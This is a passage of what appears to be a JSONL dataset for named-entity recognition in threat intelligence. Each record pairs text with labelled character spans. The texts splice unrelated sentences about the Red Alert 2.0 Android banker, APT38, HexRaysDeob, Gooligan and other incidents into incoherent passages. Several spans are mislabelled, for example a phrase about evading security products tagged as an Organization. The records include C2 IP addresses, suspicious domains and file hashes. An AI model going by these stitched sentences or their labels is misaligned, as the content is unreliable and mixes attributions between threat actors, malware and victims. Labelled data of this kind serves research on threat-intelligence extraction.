Another area where we may want to consider this motivation is the human factor .", "spans": [{"start": 40, "end": 53, "label": "Malware"}, {"start": 107, "end": 123, "label": "Indicator"}, {"start": 247, "end": 253, "label": "System"}, {"start": 267, "end": 275, "label": "Organization"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 299, "end": 303, "label": "Malware"}, {"start": 308, "end": 314, "label": "Malware"}]} {"text": "The com.dsufabunfzs.dowiflubs strings in the screenshot above refer to the internal name this particular malware was given , which in this case was randomized into alphabet salad . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . ANEL ( also referred to as UpperCut ) an internal user may have fallen prey to a spear phishing attack ,", "spans": [{"start": 181, "end": 186, "label": "Organization"}, {"start": 227, "end": 246, "label": "Organization"}, {"start": 302, "end": 324, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 382, "end": 386, "label": "Malware"}, {"start": 409, "end": 417, "label": "Malware"}, {"start": 420, "end": 436, "label": "Organization"}]} {"text": "It \u2019 s been SophosLabs \u2019 observation that Red Alert Trojans usually have a randomized internal name like this . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . is a RAT program used by APT10 and observed in Japan uniquely . 
This is a form of cyber attack used to gain an advantage over a competing organization .", "spans": [{"start": 42, "end": 59, "label": "Malware"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 158, "end": 177, "label": "Organization"}, {"start": 233, "end": 255, "label": "Organization"}, {"start": 314, "end": 319, "label": "Organization"}]} {"text": "The strings section of the app contains embedded command-and-control IP addresses , ports , and domain names in plaintext . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . According to SecureWorks , That piece explored how Biderman \u2014 who is Jewish \u2014 had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": [{"start": 124, "end": 129, "label": "Organization"}, {"start": 251, "end": 273, "label": "Organization"}, {"start": 373, "end": 384, "label": "Organization"}, {"start": 411, "end": 419, "label": "Organization"}, {"start": 497, "end": 534, "label": "Organization"}]} {"text": "It is an invaluable source of intelligence about a given campaign .. The following snippet shows the location within the Trojan where it uses SQLite database commands to store and recall command-and-control addresses : Backdoor Commands The Red Alert code also contains an embedded list of commands the botmaster can send to the bot . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 . all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening . 
The first it Uses and APIs To test for a Debugger attached or Sandbox environment by making a call to with Flag specified , then call to retrieve the addresses of the allocated pages that has been written to since the allocation or the writetrack state has been reset .", "spans": [{"start": 241, "end": 255, "label": "Malware"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 478, "end": 482, "label": "Malware"}, {"start": 653, "end": 672, "label": "System"}]} {"text": "The malware can execute a variety of arbitrary commands , including ( for example ) intercepting or sending text messages without the user \u2019 s knowledge , obtaining a copy of the victim \u2019 s Address Book , or call or text message logs , or sending phone network feature codes ( also known as USSD codes ) . APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 . Opaque predicate is a programming term that refers to decision making where there is actually only one path . Compromise usually refers to insider threats .", "spans": [{"start": 190, "end": 202, "label": "System"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 369, "end": 380, "label": "Organization"}, {"start": 442, "end": 447, "label": "Organization"}]} {"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app \u2019 s resources . We consider APT38 's operations more global and highly specialized for targeting the financial sector . For example , The code hunted for several security products to evade \u2013 including Kaspersky .", "spans": [{"start": 106, "end": 111, "label": "Organization"}, {"start": 179, "end": 195, "label": "Organization"}, {"start": 240, "end": 257, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}]} {"text": "During the app execution , the malware contacts C2 domain for further instructions . 
APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . this can be seen as calculating a value that will always return True . We also reveal what ransomware gangs are now experimenting with to break into your company \u2014 including their offers to \u201c recruit \u201d employees as insider threats .", "spans": [{"start": 85, "end": 90, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 147, "end": 172, "label": "Organization"}, {"start": 243, "end": 265, "label": "Organization"}, {"start": 403, "end": 419, "label": "Organization"}]} {"text": "Most of the network traffic we \u2019 ve observed is HTTP . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" . Control flow flattening is an obfuscation method where programs do not cleanly flow from beginning to end . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 48, "end": 52, "label": "Indicator"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 175, "end": 178, "label": "Organization"}, {"start": 317, "end": 326, "label": "System"}, {"start": 327, "end": 436, "label": "Malware"}]} {"text": "The C2 address , as stored in samples we \u2019 ve seen , comprise both an IP address and port number ; So far , all the samples we \u2019 ve tested attempted to contact an IP address on port 7878/tcp . 
Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship . Instead , If you followed Cybersecurity and Infrastructure Security Agency CISA alerts on ransomware for the year , you would have noted malicious activity attributed to many ransomware variants .", "spans": [{"start": 177, "end": 190, "label": "Indicator"}, {"start": 368, "end": 386, "label": "Organization"}, {"start": 518, "end": 571, "label": "Organization"}, {"start": 667, "end": 686, "label": "Malware"}]} {"text": "If the main C2 domain is not responsive , the bot fetches a backup C2 domain from a Twitter account . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . a switch statement is called in an infinite loop having multiple code blocks each performing operations . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 183, "end": 205, "label": "Organization"}]} {"text": "Static analysis of the code reveals that the malware downloads the overlay template to use against any of the bank ( s ) it is targeting . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . 
The obfuscations looked similar to the ones explained in Hex-Rays blog , These disruptive cyber operations began in January 2022 , prior to Russia \u2019s illegal further invasion of Ukraine and have continued throughout the war .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 218, "end": 240, "label": "Organization"}, {"start": 421, "end": 428, "label": "Organization"}]} {"text": "The malware also sends regular telemetry back to its C2 server about the infected device in the form of an HTTP POST to its C2 server . APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 . but the introduced IDA Pro plugin HexRaysDeob didn\u2019t work for one of the obfuscated ANEL samples because the tool was made for another variant of the obfuscation . Mandiant observed log entries in jcagent.log that indicated a directive named \u201c Runworkflow \u201d triggered execution on the system :", "spans": [{"start": 107, "end": 111, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 198, "end": 216, "label": "Organization"}, {"start": 258, "end": 265, "label": "System"}, {"start": 273, "end": 284, "label": "System"}, {"start": 323, "end": 327, "label": "Malware"}, {"start": 421, "end": 447, "label": "Indicator"}, {"start": 463, "end": 530, "label": "Indicator"}]} {"text": "It uses the base Dalvik User-Agent string for the device it \u2019 s running on . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations . 
Further analyses of these similarities are available via Mandiant Advantage .", "spans": [{"start": 110, "end": 115, "label": "Organization"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 130, "end": 149, "label": "Organization"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 204, "end": 207, "label": "Organization"}, {"start": 225, "end": 229, "label": "Malware"}, {"start": 271, "end": 282, "label": "System"}, {"start": 374, "end": 392, "label": "Organization"}]} {"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . After the modification , Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 19, "end": 23, "label": "Indicator"}, {"start": 118, "end": 123, "label": "Organization"}, {"start": 133, "end": 145, "label": "Organization"}, {"start": 175, "end": 191, "label": "Organization"}, {"start": 273, "end": 295, "label": "Organization"}, {"start": 446, "end": 451, "label": "Organization"}, {"start": 517, "end": 527, "label": "System"}]} {"text": "The list of banks targeted by Red Alert 2.0 includes NatWest , Barclays , Westpac , and Citibank . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks . TAU was able to recover the original code . 
Adversaries may perform data destruction over the course of an operation .", "spans": [{"start": 30, "end": 43, "label": "Malware"}, {"start": 63, "end": 71, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 119, "end": 159, "label": "Organization"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 205, "end": 208, "label": "Organization"}]} {"text": "Red Alert 2.0 is a banking bot that is currently very active online , and presents a risk to Android devices . Given the lapse in time between the spear-phishing and the heist activity in the above example , we suggest two separate but related groups under the North Korean regime were responsible for carrying out missions ; one associated with reconnaissance ( TEMP.Hermit or a related group ) and another for the heists ( APT38 ) . HexRaysDeob is an IDA Pro plugin written by Rolf Rolles to address obfuscation seen in binaries . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 244, "end": 250, "label": "Organization"}, {"start": 363, "end": 374, "label": "Organization"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 435, "end": 446, "label": "System"}, {"start": 453, "end": 460, "label": "System"}, {"start": 552, "end": 569, "label": "Organization"}, {"start": 581, "end": 592, "label": "Organization"}, {"start": 593, "end": 679, "label": "Vulnerability"}]} {"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on . 
APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . In order to perform the deobfuscation , Facebook has spotted that same malware being used in this most recent campaign , but this operation has a far broader set of infection techniques and targets outside of the Middle East .", "spans": [{"start": 114, "end": 119, "label": "Organization"}, {"start": 199, "end": 221, "label": "Organization"}, {"start": 257, "end": 262, "label": "System"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 381, "end": 388, "label": "Malware"}, {"start": 420, "end": 428, "label": "Organization"}, {"start": 500, "end": 534, "label": "Organization"}]} {"text": "So far , legitimate app stores appear to be this malware \u2019 s Achilles heel ; disabling the installation of third-party apps has been an effective prevention measure . We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations . the plugin manipulates the IDA intermediate language called microcode . PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": [{"start": 485, "end": 491, "label": "System"}, {"start": 501, "end": 510, "label": "System"}]} {"text": "Stick to Google Play and use VPN software from reputable vendors . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . 
If you aren\u2019t familiar with those structures ( e.g , The sample of PIEHOP we obtained contains programming logic errors that prevent it from successfully performing its IEC-104 control capabilities , but we believe these errors can be easily corrected .", "spans": [{"start": 9, "end": 20, "label": "System"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 170, "end": 192, "label": "Organization"}, {"start": 333, "end": 435, "label": "Indicator"}]} {"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . microcode data structures , I Enabled PowerShell Logging and Transcript logging that get the full PowerShell session with the output .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 195, "end": 217, "label": "Organization"}]} {"text": "In the wild , these are only distributed as a direct download from unofficial Web pages ( \u201c third-party \u201d app ) and not through legitimate app stores . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector . 
maturity level , There are more unused URLs in the script .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 203, "end": 227, "label": "Organization"}, {"start": 238, "end": 261, "label": "Organization"}, {"start": 319, "end": 338, "label": "Organization"}, {"start": 359, "end": 375, "label": "Organization"}, {"start": 395, "end": 435, "label": "Indicator"}]} {"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . Microcode Explorer and so on ) The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent , disrupting wind farms and internet users in central Europe .", "spans": [{"start": 0, "end": 13, "label": "Malware"}, {"start": 37, "end": 56, "label": "Indicator"}, {"start": 57, "end": 76, "label": "Indicator"}, {"start": 77, "end": 96, "label": "Indicator"}, {"start": 97, "end": 115, "label": "Indicator"}, {"start": 116, "end": 135, "label": "Indicator"}, {"start": 136, "end": 155, "label": "Indicator"}, {"start": 156, "end": 175, "label": "Indicator"}, {"start": 176, "end": 194, "label": "Indicator"}, {"start": 195, "end": 215, "label": "Indicator"}, {"start": 216, "end": 236, "label": "Indicator"}, {"start": 237, "end": 257, "label": "Indicator"}, {"start": 330, "end": 335, "label": "Organization"}, {"start": 450, "end": 472, "label": "Organization"}, {"start": 483, "end": 494, "label": "Organization"}, {"start": 576, "end": 594, "label": "System"}, {"start": 633, 
"end": 655, "label": "Organization"}, {"start": 656, "end": 662, "label": "Organization"}]} {"text": "on 167.99.176.61 : free-androidvpn.date free-androidvpn.download free-androidvpn.online free-vpn.date free-vpn.download free-vpn.online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372 TEMP.Hermit is generally linked to operations focused on South Korea and the United States . , n.bat n.bat Unknown Likely runs native scilc.exe utility s1.txt", "spans": [{"start": 3, "end": 16, "label": "Indicator"}, {"start": 19, "end": 39, "label": "Indicator"}, {"start": 88, "end": 101, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 387, "end": 430, "label": "Indicator"}]} {"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 . you should read his blog post . 
Continual education for employees to spot phishing attacks is also a key , basic measure with todays threat landscape .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 465, "end": 484, "label": "Organization"}, {"start": 546, "end": 551, "label": "Organization"}]} {"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems . Rolles also provides an overview of each obfuscation technique in the same post . Hildegard has used an IRC channel for C2 communications.[6 ]", "spans": [{"start": 128, "end": 133, "label": "Organization"}, {"start": 430, "end": 439, "label": "Organization"}, {"start": 452, "end": 463, "label": "System"}, {"start": 468, "end": 488, "label": "System"}]} {"text": "The attack campaign , named Gooligan , breached the security of over one million Google accounts . APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . 
HexRaysDeob installs two callbacks when loading : It trick users into connecting their wallet with the goal of initiating transactions to drain their account .", "spans": [{"start": 28, "end": 36, "label": "Malware"}, {"start": 81, "end": 87, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 107, "end": 113, "label": "Organization"}, {"start": 139, "end": 160, "label": "Organization"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 256, "end": 267, "label": "System"}]} {"text": "The number continues to rise at an additional 13,000 breached devices each day . APT37 , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud . optinsn_t for defeating opaque predicates ( defined as ObfCompilerOptimizer ) Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 81, "end": 86, "label": "Organization"}, {"start": 110, "end": 131, "label": "Organization"}, {"start": 160, "end": 177, "label": "Organization"}, {"start": 227, "end": 236, "label": "System"}, {"start": 282, "end": 302, "label": "System"}, {"start": 428, "end": 433, "label": "Organization"}, {"start": 499, "end": 509, "label": "Organization"}]} {"text": "Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play , Gmail , Google Photos , Google Docs , G Suite , Google Drive , and more . Early APT38 operations suggest that the group began targeting financial institutions with an intent to manipulate financial transaction systems at least as early as February 2014 , although we did not observe fraudulent transactions until 2015 . 
optblock_t for defeating control flow flattening ( defined as CFUnflattener ) In any case , the VBA code still runs whenever the files are executed .", "spans": [{"start": 130, "end": 141, "label": "System"}, {"start": 144, "end": 149, "label": "System"}, {"start": 152, "end": 165, "label": "System"}, {"start": 168, "end": 179, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 192, "end": 204, "label": "System"}, {"start": 224, "end": 229, "label": "Organization"}, {"start": 258, "end": 263, "label": "Organization"}, {"start": 280, "end": 302, "label": "Organization"}, {"start": 464, "end": 474, "label": "System"}, {"start": 560, "end": 568, "label": "Malware"}]} {"text": "Gooligan is a new variant of the Android malware campaign found by our researchers in the SnapPea app last year . We do not have evidence that the earliest targeted financial institutions were victimized by fraudulent transactions before APT38 left the compromised environments , possibly indicating that APT38 was conducting reconnaissance-only activity at that time . . It also reveals direct links to secure[.]66[.]to and zhu[.]vn , both of which also belong to Hack520 and contains his personal blog .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 404, "end": 420, "label": "Indicator"}, {"start": 425, "end": 433, "label": "Indicator"}, {"start": 465, "end": 472, "label": "Organization"}]} {"text": "Check Point reached out to the Google Security team immediately with information on this campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . 
Before continuing , Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 31, "end": 46, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 135, "end": 142, "label": "System"}, {"start": 162, "end": 169, "label": "System"}, {"start": 174, "end": 183, "label": "System"}, {"start": 273, "end": 277, "label": "Organization"}, {"start": 318, "end": 334, "label": "System"}, {"start": 374, "end": 390, "label": "System"}, {"start": 418, "end": 429, "label": "System"}, {"start": 480, "end": 493, "label": "Organization"}]} {"text": "Our researchers are working closely with Google to investigate the source of the Gooligan campaign . In early 2014 , the APT38 deployed NESTEGG ( a backdoor ) and KEYLIME ( a keylogger ) malware designed to impact financial institution-specific systems at a Southeast Asian bank . it is important to understand Hex-Rays maturity levels . 
None The bottom line is that BadBlood is not one of its kind however , for Charming Kitten , it implies a shift in target and collection priorities as they usually target dissidents , academics , diplomats , and journalists in order to further Iranian IRGC interests .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 81, "end": 98, "label": "Malware"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 136, "end": 143, "label": "System"}, {"start": 163, "end": 170, "label": "System"}, {"start": 175, "end": 184, "label": "System"}, {"start": 274, "end": 278, "label": "Organization"}, {"start": 311, "end": 319, "label": "System"}, {"start": 367, "end": 375, "label": "Organization"}, {"start": 413, "end": 428, "label": "Organization"}, {"start": 509, "end": 561, "label": "Organization"}]} {"text": "\u201c We \u2019 re appreciative of both Check Point \u2019 s research and their partnership as we \u2019 ve worked together to understand these issues , \u201d said Adrian Ludwig , Google \u2019 s director of Android security . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks . 
When a binary is loaded into IDA Pro , You 'll uncover why the US has seen a significant uptick in ransomware incidents across the board , especially in sectors like education .", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 180, "end": 187, "label": "System"}, {"start": 244, "end": 249, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 346, "end": 353, "label": "System"}, {"start": 416, "end": 426, "label": "Malware"}, {"start": 483, "end": 492, "label": "Organization"}]} {"text": "\u201c As part of our ongoing efforts to protect users from the Ghost Push family of malware , we \u2019 ve taken numerous steps to protect our users and improve the security of the Android ecosystem overall. \u201d We are very encouraged by the statement Google shared with us addressing the issue . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 . the application will perform distinct layers of code analysis and optimization , Mandiant attributed these intrusions to UNC4899 , a Democratic People 's Republic of Korea ( DPRK)-nexus actor , with a history of targeting companies within the cryptocurrency vertical .", "spans": [{"start": 59, "end": 76, "label": "Malware"}, {"start": 172, "end": 179, "label": "System"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 425, "end": 430, "label": "Organization"}, {"start": 554, "end": 561, "label": "Organization"}, {"start": 566, "end": 624, "label": "Organization"}]} {"text": "We have chosen to join forces to continue the investigation around Gooligan . 
Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations . referred to as maturity levels . The threat actor then used the built - in certutil utility to Base64 encode the segments .", "spans": [{"start": 67, "end": 75, "label": "Malware"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 387, "end": 414, "label": "System"}]} {"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 . One layer will detect shellcode , Ashley Madison \u2019s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 264, "end": 275, "label": "Organization"}, {"start": 286, "end": 295, "label": "System"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 352, "end": 356, "label": "Organization"}, {"start": 423, "end": 440, "label": "Organization"}, {"start": 537, "end": 603, "label": "System"}]} {"text": "Who is affected ? APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . 
another optimizes it into blocks , The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 34, "end": 41, "label": "System"}, {"start": 200, "end": 204, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 324, "end": 339, "label": "Organization"}]} {"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions . another determines global variables , Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 40, "end": 92, "label": "System"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 158, "end": 165, "label": "System"}, {"start": 263, "end": 277, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 422, "end": 440, "label": "Indicator"}, {"start": 445, "end": 455, "label": "Indicator"}, {"start": 472, "end": 493, "label": "Indicator"}]} {"text": "About 57 % of these devices are located in Asia and about 9 % are in Europe . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . and so forth . 
Further analysis of COSMICENERGY is available as part of .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 277, "end": 289, "label": "Malware"}]} {"text": "In our research we identified tens of fake applications that were infected with this malware . During one reported incident , APT38 caused an outage in the bank 's essential services . The optinsn_t : :f unc callback function is called in maturity levels from MMAT_ZERO ( microcode does not exist ) Viasat has said that \u201c tens of thousands of terminals have been damaged , made inoperable and can not be repaired . \u201d", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 156, "end": 160, "label": "Organization"}, {"start": 189, "end": 207, "label": "System"}, {"start": 260, "end": 269, "label": "System"}, {"start": 299, "end": 305, "label": "Organization"}]} {"text": "If you \u2019 ve downloaded one of the apps listed in Appendix A , below , you might be infected . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy . to MMAT_GLBOPT2 ( most global optimizations completed ) However , twice this year , in March and June , LockBit 's considerable rate of attacks was vastly exceeded by CL0P , which was otherwise dormant .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 342, "end": 354, "label": "System"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 506, "end": 510, "label": "Organization"}]} {"text": "You may review your application list in \u201c Settings - > Apps \u201d , if you find one of this applications , please consider downloading an antivirus product such as Check Point ZoneAlarm to check if you are indeed infected . 
As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 160, "end": 171, "label": "Organization"}, {"start": 172, "end": 181, "label": "System"}, {"start": 267, "end": 283, "label": "System"}, {"start": 300, "end": 305, "label": "Organization"}, {"start": 363, "end": 367, "label": "Organization"}, {"start": 374, "end": 399, "label": "System"}, {"start": 471, "end": 492, "label": "System"}]} {"text": "We have noticed that hundreds of the email addresses are associated with enterprise accounts worldwide . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . During the callback , It incorporates the capabilities of the FULLHOUSE tunneler in addition to supporting backdoor commands including shell command execution , file transfer , file management , and process injection .", "spans": [{"start": 105, "end": 110, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 172, "end": 194, "label": "Organization"}, {"start": 279, "end": 415, "label": "Malware"}]} {"text": "How do you know if your Google account is breached ? APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . opaque predicates pattern matching functions are called . 
Mandiant first observed the self - proclaimed hacktivist group calling itself \" Anonymous Sudan \" in January 2023 and the group soon after declared allegiance to KillNet .", "spans": [{"start": 24, "end": 30, "label": "Organization"}, {"start": 53, "end": 58, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 120, "end": 142, "label": "Organization"}, {"start": 263, "end": 271, "label": "Organization"}, {"start": 343, "end": 358, "label": "Organization"}]} {"text": "You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition . If the code pattern is matched with the definitions , Recently , concerns have grown regarding the rapid growth of commercial spyware tools , and the way in which they are being used against their intended victims .", "spans": [{"start": 99, "end": 133, "label": "Indicator"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 203, "end": 225, "label": "Organization"}]} {"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called \u201c flashing \u201d ) . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity . it is replaced with another expression for the deobfuscation . 
